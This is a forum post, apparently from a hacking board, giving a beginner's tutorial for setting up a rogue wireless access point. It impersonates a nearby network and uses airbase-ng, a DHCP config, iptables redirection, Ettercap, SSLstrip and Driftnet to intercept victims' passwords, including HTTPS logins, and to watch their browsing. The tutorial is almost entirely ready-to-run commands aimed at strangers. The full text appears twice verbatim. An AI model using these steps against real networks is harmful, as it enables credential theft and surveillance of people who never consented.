ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) 06-22-2011, 08:58 AM
#1
hello friends..this is my first tutorial on advanced password sniffing
this tutorial is based on creating rogue AP(ACCESS POINT)..
NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.
SO ...
1) THINGS U NEED
a)ESSID OF ANY NETWORK SURROUNDING YOU ..MAKE SURE MANT USERS CONNECT TO IT..
b) OPERATING SYSTEM :- BT4,UBUNTU.AND OTHER LINUX DISTRIBUTIONS..
c)TWO WORKING NETWORK INTERFACE ,A WIRELESS AND A ETHERNET CONNECTION(WITH INTERNET WOULD BE GREAT)
2) TOOLS REQUIRED
Aircrack-ng
SSLstrip
Ettercap/Ettercap-GTK and Ettercap-Common
and Driftnet ,this is not necessary but would be great if it works properly
3) NOW INSTALLING THESE
open terminal window
sudo apt-get install aircrack-ng
sudo apt-get install driftnet
sudo apt-get install ettercap
or
sudo apt-get install ettercap-gtk(GUI)
for ssl strip ..
do the following
in terminal type:
cd Documents
wget http://www.thoughtcrime.org/software/ssl...0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
sudo python ./setup.py install
that's it...u r done with the installation
now time to configure ur dhcp.conf file ..basically this file contains nameserver and u need to configure it to create new nameserver..
NOW OPEN GEDIT AND PASTE THIS
Quote:ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers [ADD YOUR DNS HERE, REMOVE BRACKETS];
range 192.168.2.130 192.168.2.140;
}
*** ADD YOUR DNS IN THE BRACKET DONT FORGET IT***
save this as dhcp.conf on desktop
now time to sniff :thumbs:
in cmd enter into root mode by typing : sudo su
now
airmon-ng start wlan0
and see the result..note in which mode monitor is enabled..generally its mon0.
To give our AP a name we use Airbase-ng [part of the aircrack-ng suite], we will be making an unsecured AP called 'VOLSBB'. mon0 is my ALFA in monitoring mode and can be substituted for whatever device name you want but it must be a packet injection support device in monitor mode!
airbase-ng -e VOLSBB mon0
So we have a ESSID lets add the netmask and gateway. [at0 is a replicated Ethernet device,,MAY BE URS IS ETH0]:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
We need to make sure that connections to the network are assigned IP addresses so we point the dhcpd3 server to our new config file.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
You may get an error saying that dhcpd is not a valid user, go to 'users and groups' on your start menu and add a user group called 'dhcpd' then try.
echo > '/var/lib/dhcp3/dhcpd.leases'
[change /home/semtex-primed/documents/ to the path of your file.]
dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
Now to make sure that the people connecting to the internet while on the network we need to make sure that the server is routed properly when running. They need to be online on our network otherwise were not sniffing any passwords!
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
This part below you need to make sure you have your 2nd interface [none sniffing one] connected to the net and swap 'wlan1' for it below.
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Next command needs changing, make sure 192.168.1.254 is changed to the default gateway of the network your using!
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Sniffing!
Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.
Setup IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
I will assume you have or know how to setup Ettercap. Below will start it monitoring the at0 interface. -T means text interface withing teminal, -q means quiet mode, -p makes sure its not in promiscuous mode and -i tells ettercap which interface to monitor.
ettercap -T -q -p -i at0 // //
Next we will setup SSLstrip, which means if the 'victims' logs into a SSL login page then we will still get the passwords. examples include Paypal, Youtube, Facebook, etc...
Open a new Terminal and type:
sslstrip -a -k -f
Now the cool stuff, Driftnet, this tool will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:
driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.
Congrats!!! u r done all u need is another person connecting to ur AP ..!!!!!:thumbs:
FEEL FREE TO ASK ANYTHING RELATED TO THIS
this tutorial is based on creating rogue AP(ACCESS POINT)..
NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.
SO ...
1) THINGS U NEED
a)ESSID OF ANY NETWORK SURROUNDING YOU ..MAKE SURE MANT USERS CONNECT TO IT..
b) OPERATING SYSTEM :- BT4,UBUNTU.AND OTHER LINUX DISTRIBUTIONS..
c)TWO WORKING NETWORK INTERFACE ,A WIRELESS AND A ETHERNET CONNECTION(WITH INTERNET WOULD BE GREAT)
2) TOOLS REQUIRED
Aircrack-ng
SSLstrip
Ettercap/Ettercap-GTK and Ettercap-Common
and Driftnet ,this is not necessary but would be great if it works properly
3) NOW INSTALLING THESE
open terminal window
sudo apt-get install aircrack-ng
sudo apt-get install driftnet
sudo apt-get install ettercap
or
sudo apt-get install ettercap-gtk(GUI)
for ssl strip ..
do the following
in terminal type:
cd Documents
wget http://www.thoughtcrime.org/software/ssl...0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
sudo python ./setup.py install
that's it...u r done with the installation
now time to configure ur dhcp.conf file ..basically this file contains nameserver and u need to configure it to create new nameserver..
NOW OPEN GEDIT AND PASTE THIS
Quote:ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers [ADD YOUR DNS HERE, REMOVE BRACKETS];
range 192.168.2.130 192.168.2.140;
}
*** ADD YOUR DNS IN THE BRACKET DONT FORGET IT***
save this as dhcp.conf on desktop
now time to sniff :thumbs:
in cmd enter into root mode by typing : sudo su
now
airmon-ng start wlan0
and see the result..note in which mode monitor is enabled..generally its mon0.
To give our AP a name we use Airbase-ng [part of the aircrack-ng suite], we will be making an unsecured AP called 'VOLSBB'. mon0 is my ALFA in monitoring mode and can be substituted for whatever device name you want but it must be a packet injection support device in monitor mode!
airbase-ng -e VOLSBB mon0
So we have a ESSID lets add the netmask and gateway. [at0 is a replicated Ethernet device,,MAY BE URS IS ETH0]:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
We need to make sure that connections to the network are assigned IP addresses so we point the dhcpd3 server to our new config file.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
You may get an error saying that dhcpd is not a valid user, go to 'users and groups' on your start menu and add a user group called 'dhcpd' then try.
echo > '/var/lib/dhcp3/dhcpd.leases'
[change /home/semtex-primed/documents/ to the path of your file.]
dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
Now to make sure that the people connecting to the internet while on the network we need to make sure that the server is routed properly when running. They need to be online on our network otherwise were not sniffing any passwords!
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
This part below you need to make sure you have your 2nd interface [none sniffing one] connected to the net and swap 'wlan1' for it below.
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Next command needs changing, make sure 192.168.1.254 is changed to the default gateway of the network your using!
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Sniffing!
Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.
Setup IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
I will assume you have or know how to setup Ettercap. Below will start it monitoring the at0 interface. -T means text interface withing teminal, -q means quiet mode, -p makes sure its not in promiscuous mode and -i tells ettercap which interface to monitor.
ettercap -T -q -p -i at0 // //
Next we will setup SSLstrip, which means if the 'victims' logs into a SSL login page then we will still get the passwords. examples include Paypal, Youtube, Facebook, etc...
Open a new Terminal and type:
sslstrip -a -k -f
Now the cool stuff, Driftnet, this tool will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:
driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.
Congrats!!! u r done all u need is another person connecting to ur AP ..!!!!!:thumbs:
FEEL FREE TO ASK ANYTHING RELATED TO THIS
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
..u should atleat try this once...